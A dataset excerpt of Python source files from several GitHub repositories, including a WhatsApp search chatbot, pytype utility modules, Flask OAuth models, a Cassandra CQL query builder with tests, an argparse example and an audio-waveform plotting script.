metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jjeanjacques10/chatbot-whatsapp",
"score": 3
} |
#### File: jjeanjacques10/chatbot-whatsapp/botSearch.py
```python
import requests, json, time
import wikipedia
from bot import Bot
class BotSearch(Bot):
def escreveNaTela(self, response):
self.caixa_de_mensagem.send_keys('*{}*:{}'.format(self.nome,response))
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisarWikipedia(self, keyword):
try:
wikipedia.set_lang("pt") # Defina antes
pesquisa = wikipedia.summary(keyword, sentences=5)
wikiaprenda = [keyword, str(pesquisa)]
self.bot.train(wikiaprenda)
except:
pesquisa = 'Termo não encontrado, tente outro'
self.caixa_de_mensagem.send_keys('*{}*:{}'.format(self.nome,pesquisa))
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisarNoticias(self, keyword):
try:
if(keyword == None):
req = requests.get('https://newsapi.org/v2/top-headlines?country=br&category=technology&pageSize=5&apiKey=<KEY>')
noticias = json.loads(req.text)
else:
req = requests.get('https://newsapi.org/v2/top-headlines?q={}&country=br&category=technology&pageSize=5&apiKey=<KEY>'.format(keyword))
noticias = json.loads(req.text)
if(noticias["totalResults"] != 0):
for news in noticias['articles']:
titulo = news['title']
link = news['url']
new = '*'+ self.nome +'*: ' + titulo + ' ' + link + '\n'
self.caixa_de_mensagem.send_keys(new)
time.sleep(1)
else:
self.escreveNaTela("*{}*: Não encontrei nada, tem certeza que o termo tem relação com tecnologia?".format(self.nome))
except:
pesquisa = "Termo {} não encontrado, tente outro".format(keyword)
self.caixa_de_mensagem.send_keys('*' + self.nome + '*:' + pesquisa)
self.botao_enviar = self.driver.find_element_by_class_name('_35EW6')
self.botao_enviar.click()
def PesquisaClima(self):
try:
weather = requests.get('http://apiadvisor.climatempo.com.br/api/v1/weather/locale/3477/current?token=<KEY>')
json_weather1 = weather.json()
weatherText = "\n======Clima em {}/{} ======\n".format(json_weather1["name"], json_weather1["state"])
weatherText += "*Condição* = {}\n".format(json_weather1["data"]["condition"])
weatherText += "*Temperature* = {}ºC\n".format(json_weather1["data"]["temperature"])
weatherText += "*Umidade* = {}%\n".format(json_weather1["data"]["humidity"])
weatherText += "*Espero ter ajudado*"
except:
weatherText = 'Houve um problema, tente mais tarde'
self.escreveNaTela(weatherText)
def PesquisaYoutube(self, keyword):
try:
if (keyword == None):
videos = "Insira um termo para pesquisa"
else:
videos = requests.get(
'https://www.googleapis.com/youtube/v3/search?part=id%2Csnippet&q={}&type=video&order=relevance&chart=mostPopular&locale=br&maxResults=5®ionCode=br&key={}'.format(
keyword,self.config['KEY']['youtube']))
json_videos = videos.json()
videos = "*Vídeos*\n"
for i in range(len(json_videos["items"])):
try:
nome = json_videos["items"][i]["snippet"]["title"]
link = json_videos["items"][i]["id"]["videoId"]
videos += "{} - https://www.youtube.com/watch?v={}\n".format(nome, link)
except:
videos += "{}\n".format(nome)
self.caixa_de_mensagem.send_keys(videos)
time.sleep(1)
except:
videos = 'Houve um problema, tente mais tarde'
self.escreveNaTela(videos)
``` |
{
"source": "jjedele/pytype",
"score": 3
} |
#### File: pytype/pytype/compare.py
```python
from pytype import abstract
from pytype import mixin
from pytype.pytd import slots
# Equality classes.
NUMERIC = {"__builtin__.bool", "__builtin__.int", "__builtin__.float",
"__builtin__.complex"}
STRING = {"__builtin__.str", "__builtin__.unicode"}
def _incompatible(left_name, right_name):
"""Incompatible primitive types can never be equal."""
for group in NUMERIC, STRING:
if left_name in group and right_name in group:
return False
return True
def _is_primitive(vm, value):
if isinstance(value, mixin.PythonConstant):
return value.pyval.__class__ in vm.convert.primitive_classes
elif isinstance(value, abstract.Instance):
return value.full_name in vm.convert.primitive_class_names
return False
def _is_equality_cmp(op):
return op in (slots.EQ, slots.NE)
def _compare_primitive_value(vm, op, left, right):
if _is_primitive(vm, right) and isinstance(right, mixin.PythonConstant):
try:
return slots.COMPARES[op](left.pyval, right.pyval)
except TypeError:
# TODO(rechen): In host Python 3, some types are not comparable; e.g.,
# `3 < ""` leads to a type error. We should do a Python 2-style comparison
# for target Python 2 and log an error for target Python 3.
pass
return _compare_primitive(op, left, right)
def _compare_primitive(op, left, right):
# Determines when primitives are definitely not equal by checking for
# compatibility of their types.
if (_is_equality_cmp(op) and
isinstance(right, abstract.Instance) and
_incompatible(left.full_name, right.full_name)):
return op != slots.EQ
return None
def _compare_tuple(op, left, right):
# Determines when tuples are definitely not equal by checking their lengths.
if (_is_equality_cmp(op) and
isinstance(right, abstract.Tuple) and
left.tuple_length != right.tuple_length):
return op != slots.EQ
return None
def _compare_dict(op, left, right):
# Determines when dicts are definitely not equal by checking their key sets.
if (_is_equality_cmp(op) and
not left.could_contain_anything and
isinstance(right, abstract.Dict) and
not right.could_contain_anything and
set(left.pyval) != set(right.pyval)):
return op != slots.EQ
return None
def cmp_rel(vm, op, left, right):
"""Compare two variables."""
if _is_primitive(vm, left) and isinstance(left, mixin.PythonConstant):
return _compare_primitive_value(vm, op, left, right)
elif _is_primitive(vm, left) and _is_primitive(vm, right):
return _compare_primitive(op, left, right)
elif isinstance(left, abstract.Tuple):
return _compare_tuple(op, left, right)
elif isinstance(left, abstract.Dict):
return _compare_dict(op, left, right)
else:
return None
```
#### File: pytype/pytype/six_overlay.py
```python
from pytype import metaclass
from pytype import overlay
class SixOverlay(overlay.Overlay):
"""A custom overlay for the 'six' module."""
def __init__(self, vm):
member_map = {
"add_metaclass": build_add_metaclass,
"with_metaclass": build_with_metaclass,
"PY2": build_version_bool(2),
"PY3": build_version_bool(3),
}
ast = vm.loader.import_name("six")
super(SixOverlay, self).__init__(vm, "six", member_map, ast)
def build_add_metaclass(name, vm):
return metaclass.AddMetaclass.make(name, vm, "six")
def build_with_metaclass(name, vm):
return metaclass.WithMetaclass.make(name, vm, "six")
def build_version_bool(major):
return lambda _, vm: vm.convert.bool_values[vm.python_version[0] == major]
```
#### File: pytype/pytype/utils.py
```python
import collections
import contextlib
import itertools
import re
import subprocess
import threading
import types
import weakref
from pytype import pytype_source_utils
# Set this value to True to indicate that pytype is running under a 2.7
# interpreter with the type annotations patch applied.
USE_ANNOTATIONS_BACKPORT = False
def message(error):
"""A convenience function which extracts a message from an exception.
Use this to replace exception.message, which is deprecated in python2 and
removed in python3.
Args:
error: The exception.
Returns:
A message string.
"""
return error.args[0] if error.args else ""
class UsageError(Exception):
"""Raise this for top-level usage errors."""
pass
def format_version(python_version):
"""Format a version tuple into a dotted version string."""
return ".".join([str(x) for x in python_version])
def split_version(version_string):
"""Parse a version string like 2.7 into a tuple."""
return tuple(map(int, version_string.split(".")))
def validate_version(python_version):
"""Raise an exception if the python version is unsupported."""
if len(python_version) != 2:
# This is typically validated in the option parser, but check here too in
# case we get python_version via a different entry point.
raise UsageError("python_version must be <major>.<minor>: %r" %
format_version(python_version))
elif python_version < (2, 7):
raise UsageError("Python version %r is not supported." %
format_version(python_version))
elif (2, 8) <= python_version < (3, 0):
raise UsageError("Python version %r is not a valid Python version." %
format_version(python_version))
elif (3, 0) <= python_version <= (3, 3):
# These have odd __build_class__ parameters, store co_code.co_name fields
# as unicode, and don't yet have the extra qualname parameter to
# MAKE_FUNCTION. Jumping through these extra hoops is not worth it, given
# that typing.py isn't introduced until 3.5, anyway.
raise UsageError(
"Python versions 3.0 - 3.3 are not supported. Use 3.4 and higher.")
elif python_version > (3, 7):
# We have an explicit per-minor-version mapping in opcodes.py
raise UsageError("Python versions > 3.7 are not yet supported.")
def strip_prefix(string, prefix):
"""Strip off prefix if it exists."""
if string.startswith(prefix):
return string[len(prefix):]
return string
def maybe_truncate(s, length=30):
"""Truncate long strings (and append '...'), but leave short strings alone."""
s = str(s)
if len(s) > length-3:
return s[0:length-3] + "..."
else:
return s
def pretty_conjunction(conjunction):
"""Pretty-print a conjunction. Use parentheses as necessary.
E.g. ["a", "b"] -> "(a & b)"
Args:
conjunction: List of strings.
Returns:
A pretty-printed string.
"""
if not conjunction:
return "true"
elif len(conjunction) == 1:
return conjunction[0]
else:
return "(" + " & ".join(conjunction) + ")"
def pretty_dnf(dnf):
"""Pretty-print a disjunctive normal form (disjunction of conjunctions).
E.g. [["a", "b"], ["c"]] -> "(a & b) | c".
Args:
dnf: A list of list of strings. (Disjunction of conjunctions of strings)
Returns:
A pretty-printed string.
"""
if not dnf:
return "false"
else:
return " | ".join(pretty_conjunction(c) for c in dnf)
def numeric_sort_key(s):
return tuple((int(e) if e.isdigit() else e) for e in re.split(r"(\d+)", s))
def concat_tuples(tuples):
return tuple(itertools.chain.from_iterable(tuples))
def get_python_exe(python_version):
"""Automatically infer the --python_exe argument.
Arguments:
python_version: the version tuple (e.g. (2, 7))
Returns:
The inferred python_exe argument
"""
python_exe = "python%d.%d" % python_version
# Use custom interpreters, if provided, in preference to the ones in $PATH
custom_python_exe = pytype_source_utils.get_custom_python_exe(python_exe)
if custom_python_exe:
python_exe = custom_python_exe
if USE_ANNOTATIONS_BACKPORT and python_version == (2, 7):
python_exe += " -T"
return python_exe
def get_python_exe_version(python_exe):
"""Determine the major and minor version of given Python executable.
Arguments:
python_exe: absolute path to the Python executable
Returns:
Version as (major, minor) tuple"""
try:
python_exe_version = subprocess.check_output(
python_exe + " -V", shell=True, stderr=subprocess.STDOUT).decode()
except subprocess.CalledProcessError:
return None
return parse_exe_version_string(python_exe_version)
def parse_exe_version_string(version_str):
"""Parse the version string of a Python executable.
Arguments:
version_str: Version string as emitted by running `PYTHON_EXE -V`
Returns:
Version as (major, minor) tuple"""
# match the major.minor part of the version string, ignore the micro part
matcher = re.search(r'Python (\d+\.\d+)\.\d+', version_str)
if matcher:
return split_version(matcher.group(1))
else:
return None
def list_startswith(l, prefix):
"""Like str.startswith, but for lists."""
return l[:len(prefix)] == prefix
def list_strip_prefix(l, prefix):
"""Remove prefix, if it's there."""
return l[len(prefix):] if list_startswith(l, prefix) else l
def _arg_names(f):
"""Return the argument names of a function."""
return f.__code__.co_varnames[:f.__code__.co_argcount]
class memoize(object): # pylint: disable=invalid-name
"""A memoizing decorator that supports expressions as keys.
Use it like this:
@memoize
def f(x):
...
or
@memoize("(id(x), y)")
def f(x, y, z):
...
.
Careful with methods. If you have code like
@memoize("x")
def f(self, x):
...
then memoized values will be shared across instances.
This decorator contains some speed optimizations that make it not thread-safe.
"""
def __new__(cls, key_or_function):
if isinstance(key_or_function, types.FunctionType):
f = key_or_function
key = "(" + ", ".join(_arg_names(f)) + ")"
return memoize(key)(f)
else:
key = key_or_function
return object.__new__(cls)
def __init__(self, key):
self.key = key
def __call__(self, f):
key_program = compile(self.key, filename=__name__, mode="eval")
argnames = _arg_names(f)
memoized = {}
no_result = object()
if f.__defaults__:
defaults = dict(zip(argnames[-len(f.__defaults__):], f.__defaults__))
else:
defaults = {}
pos_and_arg_tuples = list(zip(range(f.__code__.co_argcount), argnames))
shared_dict = {}
# TODO(kramm): Use functools.wraps or functools.update_wrapper to preserve
# the metadata of the original function.
def call(*posargs, **kwargs):
"""Call a memoized function."""
if kwargs or defaults:
# Slower version; for default arguments, we need two dictionaries.
args = defaults.copy()
args.update(dict(zip(argnames, posargs)))
args.update(kwargs)
key = eval(key_program, args) # pylint: disable=eval-used
else:
# Faster version, if we have no default args.
for pos, arg in pos_and_arg_tuples:
# We know we write *all* the values, so we can re-use the dictionary.
shared_dict[arg] = posargs[pos]
key = eval(key_program, shared_dict) # pylint: disable=eval-used
result = memoized.get(key, no_result)
if result is no_result:
# Call the actual function.
result = f(*posargs, **kwargs)
memoized[key] = result
return result
return call
def invert_dict(d):
"""Invert a dictionary.
Converts a dictionary (mapping strings to lists of strings) to a dictionary
that maps into the other direction.
Arguments:
d: Dictionary to be inverted
Returns:
A dictionary n with the property that if "y in d[x]", then "x in n[y]".
"""
inverted = collections.defaultdict(list)
for key, value_list in d.items():
for val in value_list:
inverted[val].append(key)
return inverted
class DynamicVar(object):
"""A dynamically scoped variable.
This is a per-thread dynamic variable, with an initial value of None.
The bind() call establishes a new value that will be in effect for the
duration of the resulting context manager. This is intended to be used
in conjunction with a decorator.
"""
def __init__(self):
self._local = threading.local()
def _values(self):
values = getattr(self._local, "values", None)
if values is None:
values = [None] # Stack of bindings, with an initial default of None.
self._local.values = values
return values
@contextlib.contextmanager
def bind(self, value):
"""Bind the dynamic variable to the supplied value."""
values = self._values()
try:
values.append(value) # Push the new binding.
yield
finally:
values.pop() # Pop the binding.
def get(self):
"""Return the current value of the dynamic variable."""
return self._values()[-1]
class AnnotatingDecorator(object):
"""A decorator for storing function attributes.
Attributes:
lookup: maps functions to their attributes.
"""
def __init__(self):
self.lookup = {}
def __call__(self, value):
def decorate(f):
self.lookup[f.__name__] = value
return f
return decorate
class VirtualMachineWeakrefMixin(object):
__slots__ = ["vm_weakref"]
def __init__(self, vm):
self.vm_weakref = weakref.ref(vm)
@property
def vm(self):
return self.vm_weakref()
``` |
{
"source": "JJediny/fismatic",
"score": 3
} |
#### File: fismatic/test/test_demo.py
```python
from ..control import Control
from ..control_set import ControlSet
from ..demo import similar_implementations
def test_similar_implementations_empty():
results = similar_implementations([], "foo", "a", "bar")
assert results == []
def test_similar_implementations_excludes_blank():
control = Control("AC-2")
control.implementation = {"A": " "}
control_set = ControlSet([control])
results = similar_implementations([control_set], "AC-2", "A", "foo")
assert results == []
def test_similar_implementations():
control1 = Control("AC-1")
control1.implementation = {"A": "Something else."}
control2 = Control("AC-2")
imp1 = "This is about computers."
control2.implementation = {"A": imp1}
control_set1 = ControlSet([control1, control2])
control3 = Control("AC-2")
imp2 = "This is also about computers. Computers do a lot."
control3.implementation = {"A": imp2}
control_set2 = ControlSet([control3])
control4 = Control("AC-2")
imp3 = "Irrelevant."
control4.implementation = {"A": imp3}
control_set3 = ControlSet([control4])
control_sets = [control_set1, control_set2, control_set3]
results = similar_implementations(control_sets, "AC-2", "A", "computers")
result_txt = [imp.text for imp in results]
assert result_txt == [imp2, imp1, imp3]
``` |
{
"source": "jjeeffff/Musical-Instrument-Recognition",
"score": 3
} |
#### File: Musical-Instrument-Recognition/cnn/CNN.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils import data
import numpy as np
# Load data
data_set = np.load("data_set.npy")
target_set = np.load("target_set.npy")
num_instru = int(np.max(target_set)) + 1
# Hyper parameters
EPOCH = 30
BATCH_SIZE = 200
LEARNING_RATE = 1e-3
# Convert to Tensor
X = torch.from_numpy(data_set)
X = Variable(X.unsqueeze_(1).float())
Y = Variable(torch.from_numpy(target_set))
train_data = data.TensorDataset(X, Y)
train_loader = data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)
#test_x = Variable(torch.unsqueeze(test_data.test_data, dim=1), volatile=True).type(torch.FloatTensor)[:2000]/255.
#test_y = test_data.test_lables[:2000]
# CNN structure
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Sequential( # Input shape: 1*64*200
nn.Conv2d(in_channels=1,
out_channels=16,
kernel_size=5,
stride=2,
padding=0), # Shape: 16*30*98
nn.MaxPool2d(kernel_size=2) # Shape: 16*15*49
)
self.full_conn = nn.Sequential(
nn.Linear(16*15*49, 1024),
nn.ReLU(),
nn.Linear(1024, num_instru)
)
def forward(self, x):
x = self.conv1(x)
x = x.view(x.size(0), -1) # Flatten to (BATCH_SIZE, 16*15*49)
output = self.full_conn(x)
return output
cnn = CNN()
# Optimizer
optimizer = torch.optim.Adam(cnn.parameters(), lr=LEARNING_RATE)
# Loss Function
loss_func = nn.CrossEntropyLoss()
# Training process
for epoch in range(EPOCH):
for batch_x, batch_y in train_loader:
batch_x, batch_y = Variable(batch_x), Variable(batch_y)
# Perform forward pass
output = cnn(batch_x)
# Compute loss
loss = loss_func(output, batch_y)
# Clear the gradients
optimizer.zero_grad()
# Perform backward pass
loss.backward()
# Update the parameters
optimizer.step()
# Print progress
if epoch % 5 == 0:
predicted = torch.argmax(cnn(X), dim=1).view(-1)
# Calculate and print the training accuracy
total = Y.size(0)
correct = predicted == Y
print('Epoch [%d/%d] Accuracy: %.4f%%'
% (epoch, EPOCH, 100*sum(correct.numpy())/total))
``` |
{
"source": "jjeejj/alien_invasion",
"score": 3
} |
#### File: jjeejj/alien_invasion/settings.py
```python
class Settings():
'''保存设置信息'''
def __init__(self):
'''初始化游戏的静态设置'''
self.screen_width = 850
self.screen_heght = 600
self.bg_color = (230, 230, 230)
# 玩家飞船数量设置
self.ship_limit = 3
# 子弹设置
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
self.bullets_allowed = 10
# 外星人设置
## 外星人移动速度
self.fleet_drop_speed = 5
self.speedup_scale = 1.1
self.initialize_dynamic_settings()
def initialize_dynamic_settings(self):
self.fleet_direction = 1 # 1表示向右移,为-1表示向左移
self.ship_speed_factor = 5.3 # 移动步长
self.bullet_speed_factor = 30
self.alien_speed_factor = 1
def increase_speedO(self):
'''提高速度设置'''
self.alien_speed_factor *= self.speedup_scale
self.ship_speed_factor *= self.speedup_scale
self.alien_speed_factor *= self.speedup_scale
``` |
{
"source": "jjelarmo/Basic-Interpreter",
"score": 3
} |
#### File: jjelarmo/Basic-Interpreter/shell.py
```python
import basic
def run(text):
lexer = basic.Lexer(text)
tokens = lexer.make_tokens()
return tokens
while True:
text = input('basic > ')
result = run(text)
print(result)
``` |
{
"source": "jjelosua/ML_audio_classification",
"score": 3
} |
#### File: preprocess/scripts/generate_audio_image.py
```python
import os
from csvkit.py3 import CSVKitDictReader, CSVKitDictWriter
import numpy as np
import matplotlib.pyplot as plt
import librosa
# Parallel execution libs
from joblib import Parallel, delayed
from collections import defaultdict
import joblib.parallel
# PARALLEL EXECUTION SETTINGS
# Override joblib callback default callback behavior
class BatchCompletionCallBack(object):
completed = defaultdict(int)
def __init__(self, dispatch_timestamp, batch_size, parallel):
self.dispatch_timestamp = dispatch_timestamp
self.batch_size = batch_size
self.parallel = parallel
def __call__(self, out):
BatchCompletionCallBack.completed[self.parallel] += 1
if BatchCompletionCallBack.completed[self.parallel] % 10 == 0:
print("processed {} items"
.format(BatchCompletionCallBack.completed[self.parallel]))
if self.parallel._original_iterator is not None:
self.parallel.dispatch_next()
# MonkeyPatch BatchCompletionCallBack
joblib.parallel.BatchCompletionCallBack = BatchCompletionCallBack
# GLOBAL SETTINGS
cwd = os.path.dirname(__file__)
INPUT_PATH = os.path.join(cwd, '../../data/input')
INPUT_FILES = {
'train': 'labeled_wav_local',
'test': 'unlabeled_wav_local'
}
OUTPUT_FILES = {
'train': 'labeled_wav_image_local',
'test': 'unlabeled_wav_image_local'
}
OUTPUT_PATH = os.path.abspath(os.path.join(cwd, '../../data/output/images'))
HEADER = ['title', 'audio_file', 'image_file', 'length', 'label']
PLOT_DURATION = 60
SAMPLE_RATE = 8000
N_CORES = 7
def gen_picture(audio_path, image_path, duration):
y, sr = librosa.load(audio_path, duration=duration, sr=None)
# Fix the duration in order to generate a fair feature
# y = librosa.util.fix_length(y, duration * SAMPLE_RATE)
# Generate subplot
fig, ax = plt.subplots(1)
# Give some margin to acommodate the plot
ax.set_ylim([-1.1, 1.1])
# Config the specs of the image
ax.spines['top'].set_linewidth(0.5)
ax.spines['right'].set_linewidth(0.5)
ax.spines['bottom'].set_linewidth(0.5)
ax.spines['left'].set_linewidth(0.5)
ax.spines['top'].set_color('black')
ax.spines['right'].set_color('black')
ax.spines['bottom'].set_color('black')
ax.spines['left'].set_color('black')
ax.set_ylabel('Amplitud')
ax.set_xlabel('Segundos')
ax.yaxis.label.set_color('black')
ax.xaxis.label.set_color('black')
# Plot the audio image
plt.plot(np.linspace(0.0, y.size/sr, y.size), y, color='#5f8724')
try:
fig.savefig(image_path,
figsize=(8, 6),
facecolor='white',
transparent=True,
dpi=100)
finally:
plt.clf()
plt.close()
def make_plot(labeled, row):
'''make a plot from the audio file'''
dataset = 'train' if labeled else 'test'
result = {
'title': row['title'],
'audio_file': None,
'image_file': None,
'length': None,
'label': None
}
audio_path = row['audio_file']
fname = audio_path.split('/')[-1]
fname = fname.replace('.wav', '.png')
image_path = '{}/{}/{}'.format(OUTPUT_PATH, dataset, fname)
result['audio_file'] = row['audio_file']
result['image_file'] = image_path
result['length'] = row['length']
result['label'] = row['label']
try:
if not os.path.exists(image_path):
gen_picture(audio_path, image_path, PLOT_DURATION)
except Exception as e:
print("found error in %s at %s. Reason %s" % (
image_path,
PLOT_DURATION,
e))
return result
def process_audios(labeled=True):
'''extract the image of the audio file'''
dataset = 'train' if labeled else 'test'
with open('%s/%s.csv' % (INPUT_PATH, OUTPUT_FILES[dataset]), 'w') as fout:
writer = CSVKitDictWriter(fout, fieldnames=HEADER)
writer.writeheader()
with open('%s/%s.csv' % (INPUT_PATH, INPUT_FILES[dataset]), 'r') as f:
reader = CSVKitDictReader(f)
r = Parallel(n_jobs=N_CORES)(delayed(make_plot)(labeled, row)
for row in reader)
print('finished processing {}.csv'.format(INPUT_FILES[dataset]))
writer.writerows(r)
def create_folders(paths=None):
for path in paths:
if not os.path.exists(path):
os.makedirs(path)
def create_folder_structure():
'''Create a list of the required folders for the script execution'''
paths = [
# Training set audio files
'%s/train' % OUTPUT_PATH,
# Test set audio files
'%s/test' % OUTPUT_PATH]
create_folders(paths)
def run():
# Initialize execution context
create_folder_structure()
# Download training set
# Download test set
process_audios(labeled=True)
process_audios(labeled=False)
if __name__ == '__main__':
run()
``` |
{
"source": "JJendryka/Chores",
"score": 3
} |
#### File: JJendryka/Chores/models.py
```python
from flask_sqlalchemy import SQLAlchemy
from authlib.integrations.sqla_oauth2 import OAuth2ClientMixin, OAuth2TokenMixin, OAuth2AuthorizationCodeMixin
from flask_bcrypt import generate_password_hash, check_password_hash
db = SQLAlchemy()
def init_app(app):
db.init_app(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(60), unique=True, nullable=False)
password = db.Column(db.Text, nullable=False)
is_admin = db.Column(db.Boolean, nullable=False)
counters = db.relationship('Counter', backref='user', lazy=True)
def get_user_id(self):
return self.id
def check_password(self, password):
return check_password_hash(self.password, password)
def set_password(self, password):
self.password = generate_password_hash(password)
class Chore(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(60), unique=True, nullable=False)
period_of_days = db.Column(db.Integer, nullable=False)
cooldown_time = db.Column(db.Integer)
minimum_point = db.Column(db.Integer)
counters = db.relationship('Counter', backref='chore', lazy=True)
class Counter(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.Integer, nullable=False)
multiplier = db.Column(db.Float)
chore_id = db.Column(db.Integer, db.ForeignKey('chore.id', ondelete='CASCADE'), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'), nullable=False)
class Client(db.Model, OAuth2ClientMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'))
user = db.relationship('User')
class Token(db.Model, OAuth2TokenMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id', ondelete='CASCADE'))
user = db.relationship('User')
class AuthorizationCode(db.Model, OAuth2AuthorizationCodeMixin):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(
db.Integer, db.ForeignKey('user.id', ondelete='CASCADE')
)
user = db.relationship('User')
``` |
{
"source": "jjengo/cql-builder",
"score": 3
} |
#### File: cql-builder/cql_builder/assignment.py
```python
from cql_builder.base import Assignment, ValidationError
# {key=value, key=value, ...}
class Set(Assignment):
def __init__(self, **kwargs):
self.kwargs = kwargs
@property
def cql(self):
return ', '.join('{}=%s'.format(k) for k in self.kwargs.keys())
@property
def values(self):
return self.kwargs.values()
# names['foo'] = 'bar'
# names[2] = 'foo'
class SetAt(Assignment):
def __init__(self, name, key, value):
self.name = name
self.key = key
self.value = value
@property
def cql(self):
return '{}[%s] = %s'.format(self.name)
@property
def values(self):
return [self.key, self.value]
# name = name + {value, value, ...}
# name = name + [value, value, ...]
class Add(Assignment):
def __init__(self, name, value):
self.name = name
self.value = value
@property
def cql(self):
return '{}={} + %s'.format(self.name, self.name)
@property
def values(self):
return [self.value]
# name = name - {value, value, ...}
# name = name - [value, value, ...]
class Subtract(Assignment):
def __init__(self, name, value):
self.name = name
self.value = value
@property
def cql(self):
return '{}={} - %s'.format(self.name, self.name)
@property
def values(self):
return [self.value]
# assignment, assignment, ...
class Assignments(Assignment):
def __init__(self):
self.assignments = []
def add(self, *assignment):
self.assignments.extend(assignment)
@property
def cql(self):
return ', '.join(assign.cql for assign in self.assignments)
@property
def values(self):
value_list = []
for assign in self.assignments:
value_list.extend(assign.values)
return value_list
def validate(self):
if not self.assignments:
raise ValidationError('assignments is empty')
for assign in self.assignments:
if assign is None:
raise ValidationError('assignment: {}'.format(assign))
if not isinstance(assign, Assignment):
raise ValidationError('assignment {!r} must be of type Assignment'.format(assign))
```
#### File: cql-builder/cql_builder/builder.py
```python
from cql_builder.statement import Insert, Update, Select, Delete, Truncate
class QueryBuilder(object):
@staticmethod
def insert_into(column_family, keyspace=None):
return Insert(column_family, keyspace)
@staticmethod
def update(column_family, keyspace=None):
return Update(column_family, keyspace)
@staticmethod
def select_from(column_family, keyspace=None):
return Select(column_family, keyspace)
@staticmethod
def delete_from(column_family, keyspace=None):
return Delete(column_family, keyspace)
@staticmethod
def truncate(column_family, keyspace=None):
return Truncate(column_family, keyspace)
```
#### File: cql-builder/cql_builder/selection.py
```python
from cql_builder.base import Selection
# column, column, ...
class Columns(Selection):
def __init__(self, *args):
self.args = args
@property
def cql(self):
return ', '.join(self.args)
@property
def values(self):
return []
# column[key]
class ValueAt(Selection):
def __init__(self, name, key):
self.name = name
self.key = key
@property
def cql(self):
return '{}[%s]'.format(self.name)
@property
def values(self):
return [self.key]
# COUNT(*)
class Count(Selection):
@property
def cql(self):
return 'COUNT(*)'
@property
def values(self):
return []
# *
class All(Selection):
@property
def cql(self):
return '*'
@property
def values(self):
return []
```
#### File: cql-builder/tests/test_condition.py
```python
import unittest
from unittest import TestCase
from datetime import timedelta
from cql_builder.base import ValidationError
from cql_builder.condition import AllEqual, In, Where, Using
from cql_builder.condition import eq, gt, gte, lt, lte
class TestComparison(TestCase):
def test_eq(self):
name, value = 'x', 13
comp = eq(name, value)
self.assertEquals(comp.cql, '{}=%s'.format(name))
self.assertEquals(comp.values, [value])
def test_gt(self):
name, value = 'x', 13
comp = gt(name, value)
self.assertEquals(comp.cql, '{}>%s'.format(name))
self.assertEquals(comp.values, [value])
def test_gte(self):
name, value = 'x', 13
comp = gte(name, value)
self.assertEquals(comp.cql, '{}>=%s'.format(name))
self.assertEquals(comp.values, [value])
def test_lt(self):
name, value = 'x', 13
comp = lt(name, value)
self.assertEquals(comp.cql, '{}<%s'.format(name))
self.assertEquals(comp.values, [value])
def test_lte(self):
name, value = 'x', 13
comp = lte(name, value)
self.assertEquals(comp.cql, '{}<=%s'.format(name))
self.assertEquals(comp.values, [value])
class TestAll(TestCase):
def test_eq_single(self):
kwargs = {'last': 'foo'}
cond = AllEqual(**kwargs)
self.assertEquals(cond.cql, '{}=%s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
def test_eq_multi(self):
kwargs = {'first': 'foo', 'last': 'bar'}
cond = AllEqual(**kwargs)
self.assertEquals(cond.cql, '{}=%s AND {}=%s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
class TestIn(TestCase):
def test_list_value(self):
name, value = 'name', ['foo', 13]
cond = In(name, value)
self.assertEquals(cond.cql, '{} IN (%s, %s)'.format(name))
self.assertEquals(cond.values, value)
def test_set_value(self):
name, value = 'name', set(['foo', 13])
cond = In(name, value)
self.assertEquals(cond.cql, '{} IN (%s, %s)'.format(name))
self.assertEquals(cond.values, value)
def test_not_iterable_value(self):
self.assertRaises(ValidationError, In, 'name', None)
self.assertRaises(ValidationError, In, 'name', 13)
class TestUsing(TestCase):
def test_option_single(self):
cond = Using(ttl=3600)
self.assertEquals(cond.cql, 'USING TTL %s')
self.assertEquals(cond.values, [3600])
def test_option_multi(self):
kwargs = {'TTL': 3600, 'TIMESTAMP': 3600}
cond = Using(**kwargs)
self.assertEquals(cond.cql, 'USING {} %s AND {} %s'.format(*kwargs.keys()))
self.assertEquals(cond.values, kwargs.values())
def test_option_timedelta(self):
kwargs = {'TTL': timedelta(hours=1)}
cond = Using(**kwargs)
self.assertEquals(cond.values, [3600])
class TestWhere(TestCase):
def test_condition_single(self):
cond = eq('name', 'foo')
where = Where(cond)
self.assertEquals(where.cql, cond.cql)
self.assertEquals(where.values, cond.values)
def test_condition_multi(self):
names, values = ['first', 'last'], ['foo', 'bar']
conditions = [eq(name, value) for name, value in zip(names, values)]
where = Where(*conditions)
self.assertEquals(where.cql, ' AND '.join(cond.cql for cond in conditions))
self.assertEquals(where.values, values)
def test_invalid_condition_type(self):
conditions = ['foo']
self.assertRaises(ValidationError, Where, *conditions)
def test_none_condition(self):
conditions = [eq('name', 'foo'), None]
self.assertRaises(ValidationError, Where, *conditions)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjensenmike/python",
"score": 4
} |
#### File: python/argparser/argparse_ex.py
```python
from argparse import ArgumentParser
def main():
"""main function run when called from the conditional below. Creates the
parser object, parses the responses, and prints out the screenname if one
is provided from the command line
"""
usage = 'Collect screenname info'
parser = ArgumentParser(usage=usage)
parser.add_argument('-n', action='store', dest='screenname', default=None,
help='screen name to pull information about')
args = parser.parse_args()
if args.screenname:
print 'Screen name to check: {}'.format(args.screenname)
else:
print 'No screen name info!!!'
if __name__ == '__main__':
main()
``` |
{
"source": "jjepsuomi/LPO-SCV",
"score": 3
} |
